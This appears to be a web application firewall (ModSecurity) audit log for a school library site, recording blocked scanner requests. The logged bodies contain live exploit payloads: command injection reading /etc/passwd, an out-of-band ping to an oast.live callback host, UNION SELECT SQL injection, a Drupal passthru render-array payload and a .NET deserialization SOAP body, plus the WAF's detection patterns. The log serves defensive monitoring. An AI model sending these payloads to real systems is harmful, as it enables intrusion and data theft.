[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748283292119182 2220 (- - -) Stopwatch2: 1748283292119182 2220; combined=903, p1=353, p2=528, p3=0, p4=0, p5=22, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3cf444b-Z-- --286d6156-A-- [27/May/2025:01:14:55 +0700] aDSvn_7lSIOiZEhmvSznwwAAAFI 103.236.140.4 56344 103.236.140.4 8181 --286d6156-B-- GET /Telerik.Web.UI.WebResource.axd?_TSM_CombinedScripts_=;;System.Web.Extensions,%20Version=4.0.0.0,%20Culture=neutral,%20PublicKeyToken=31bf3856ad364e35:de-DE:db3d9eb3-6d72-4959-b303-32b61119a4a8:ea597d4b:b25378d2 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168940734 --286d6156-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --286d6156-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748283295106740 4244 (- - -) Stopwatch2: 1748283295106740 4244; combined=2576, p1=557, p2=1993, p3=0, p4=0, p5=26, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --286d6156-Z-- --cbce6e21-A-- [27/May/2025:01:16:20 +0700] aDSv9P7lSIOiZEhmvSzpKwAAAFM 103.236.140.4 58796 103.236.140.4 8181 --cbce6e21-B-- POST /apply_sec.cgi HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id/login_pic.asp Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 95 User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: uid=1234123 X-Varnish: 159436013 --cbce6e21-C-- html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acat%20%2Fetc%2Fpasswd --cbce6e21-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cbce6e21-E-- --cbce6e21-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /apply_sec.cgi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748283380120494 2274 (- - -) Stopwatch2: 1748283380120494 2274; combined=685, p1=401, p2=255, p3=0, p4=0, p5=28, sr=62, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cbce6e21-Z-- --7009566b-A-- [27/May/2025:01:20:15 +0700] aDSw31SmKJQK-9oQ9STmMAAAAIY 103.236.140.4 37408 103.236.140.4 8181 --7009566b-B-- POST /cgi-bin/supportInstaller HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 83 User-Agent: MSIE Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 159436022 --7009566b-C-- fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0-- --7009566b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7009566b-E-- --7009566b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0 found within MATCHED_VAR: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: cgi-script Stopwatch: 1748283615109485 2245 (- - -) Stopwatch2: 1748283615109485 2245; combined=1422, p1=376, p2=1023, p3=0, p4=0, p5=23, sr=54, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7009566b-Z-- --65dab704-A-- [27/May/2025:01:25:42 +0700] aDSyJv7lSIOiZEhmvSzwVQAAAFU 103.236.140.4 46638 103.236.140.4 8181 --65dab704-B-- GET /images/stories/admin-post.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 40.85.132.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 40.85.132.91 X-Forwarded-Proto: http Connection: close --65dab704-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --65dab704-H-- Message: Access denied with code 403 (phase 2). String match ".php" at REQUEST_FILENAME. 
[file "/usr/local/apache/modsecurity-cwaf/rules/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748283942776369 2376 (- - -) Stopwatch2: 1748283942776369 2376; combined=940, p1=344, p2=568, p3=0, p4=0, p5=27, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --65dab704-Z-- --eb37861e-A-- [27/May/2025:01:26:23 +0700] aDSyT3FOzWd_Ai7zJXUfSwAAAAY 103.236.140.4 47742 103.236.140.4 8181 --eb37861e-B-- POST /account HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 100 User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168940803 --eb37861e-C-- name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat%20%2Fetc%2Fpasswd')]=tlgmy --eb37861e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb37861e-E-- --eb37861e-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /account"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748283983104122 2069 (- - -) Stopwatch2: 1748283983104122 2069; combined=643, p1=413, p2=200, p3=0, p4=0, p5=29, sr=62, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb37861e-Z-- --59027e5c-A-- [27/May/2025:01:26:58 +0700] aDSycnFOzWd_Ai7zJXUfmAAAABc 103.236.140.4 48722 103.236.140.4 8181 --59027e5c-B-- POST /soap.cgi?service=whatever-control;curl HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 16 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15 Content-Type: text/xml SOAPAction: "whatever-serviceType#whatever-action" X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168940806 --59027e5c-C-- whatever-content --59027e5c-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --59027e5c-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748284018103031 5776 (- - -) Stopwatch2: 1748284018103031 5776; combined=4672, p1=373, p2=4205, p3=32, p4=33, p5=29, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59027e5c-Z-- --5fff034a-A-- [27/May/2025:01:26:58 +0700] aDSycnFOzWd_Ai7zJXUfmgAAABU 103.236.140.4 48730 103.236.140.4 8181 --5fff034a-B-- GET /card_scan.php?No=30&ReaderNo=%60ping%20d0q9cd1gpeook7mlf7sgbyz3j4ai5t3w3.oast.live%60 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168940809 --5fff034a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5fff034a-E-- --5fff034a-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: `ping found within ARGS:ReaderNo: `ping d0q9cd1gpeook7mlf7sgbyz3j4ai5t3w3.oast.live`"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748284018120160 1692 (- - -) Stopwatch2: 1748284018120160 1692; combined=558, p1=354, p2=176, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5fff034a-Z-- --1e390a50-A-- [27/May/2025:01:26:59 +0700] aDSyc_7lSIOiZEhmvSzydgAAAEg 103.236.140.4 48762 103.236.140.4 8181 --1e390a50-B-- POST /password_change.cgi HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 73 User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168940812 --1e390a50-C-- user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2 --1e390a50-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e390a50-E-- --1e390a50-H-- Message: Access denied with code 403 (phase 2). 
Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /password_change.cgi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748284019099508 2046 (- - -) Stopwatch2: 1748284019099508 2046; combined=511, p1=338, p2=154, p3=0, p4=0, p5=19, sr=49, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e390a50-Z-- --59f8853f-A-- [27/May/2025:01:27:00 +0700] aDSydFSmKJQK-9oQ9STpoAAAAIM 103.236.140.4 48796 103.236.140.4 8181 --59f8853f-B-- POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.0 Referer: perpustakaan.smkn22jakarta.sch.id/user/register Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 631 User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/113.0 Safari/537.36 Accept: application/json Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663 X-Requested-With: XMLHttpRequest X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168900285 --59f8853f-C-- -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#post_render][]" passthru -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#type]" markup 
-----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#markup]" cat /etc/passwd -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="form_id" user_register_form -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="_drupal_ajax" --59f8853f-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --59f8853f-E-- --59f8853f-H-- Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748284020100750 5636 (- - -) Stopwatch2: 1748284020100750 5636; combined=4025, p1=398, p2=3529, p3=31, p4=35, p5=32, sr=63, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59f8853f-Z-- --6be1b870-A-- [27/May/2025:01:27:00 +0700] aDSydP7lSIOiZEhmvSzyeAAAAEI 103.236.140.4 48804 103.236.140.4 8181 --6be1b870-B-- POST /xmlpserver/ReportTemplateService.xls HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 96 User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: text/xml; charset=UTF-8 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168940818 --6be1b870-C-- --6be1b870-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --6be1b870-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748284020120189 4248 (- - -) Stopwatch2: 1748284020120189 4248; combined=2928, p1=338, p2=2521, p3=21, p4=23, p5=25, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6be1b870-Z-- --e3cd9109-A-- [27/May/2025:01:27:01 +0700] aDSydc-W3hHsdQpQwdTUigAAAMg 103.236.140.4 48844 103.236.140.4 8181 --e3cd9109-B-- POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 8004 User-Agent: Mozilla/5.0 (Debian; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168852898 --e3cd9109-C-- stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%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%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%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%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e --e3cd9109-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN 
Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3cd9109-E-- --e3cd9109-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)((?:\\bx(?:link:href|html|mlns)|!ENTITY\\b.{0,399}?\\b(?:SYSTEM|PUBLIC)|\\bdata:text\\/html))" at ARGS:stagingTaskData. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "170"] [id "213060"] [rev "7"] [msg "COMODO WAF: XSS Filter - Category 3: Attribute Vector||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748284021120803 9495 (- - -) Stopwatch2: 1748284021120803 9495; combined=8098, p1=331, p2=7747, p3=0, p4=0, p5=20, sr=47, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3cd9109-Z-- --62cd3267-A-- [27/May/2025:01:29:24 +0700] aDSzBP7lSIOiZEhmvSzz5AAAAFg 103.236.140.4 52714 103.236.140.4 8181 --62cd3267-B-- POST /cgi-bin/supportInstaller HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 83 User-Agent: MSIE Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168852907 --62cd3267-C-- fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0-- --62cd3267-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62cd3267-E-- --62cd3267-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! 
?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0 found within MATCHED_VAR: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: cgi-script Stopwatch: 1748284164120982 3528 (- - -) Stopwatch2: 1748284164120982 3528; combined=1807, p1=467, p2=1310, p3=0, p4=0, p5=30, sr=83, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62cd3267-Z-- --6f489f10-A-- [27/May/2025:01:31:46 +0700] aDSzknFOzWd_Ai7zJXUkMAAAAAQ 103.236.140.4 56602 103.236.140.4 8181 --6f489f10-B-- GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.6) AppleWebKit/620.30 (KHTML, like Gecko) Version/17.0 Safari/620.30 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 159436057 --6f489f10-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6f489f10-H-- Message: Access denied with code 403 (phase 2). 
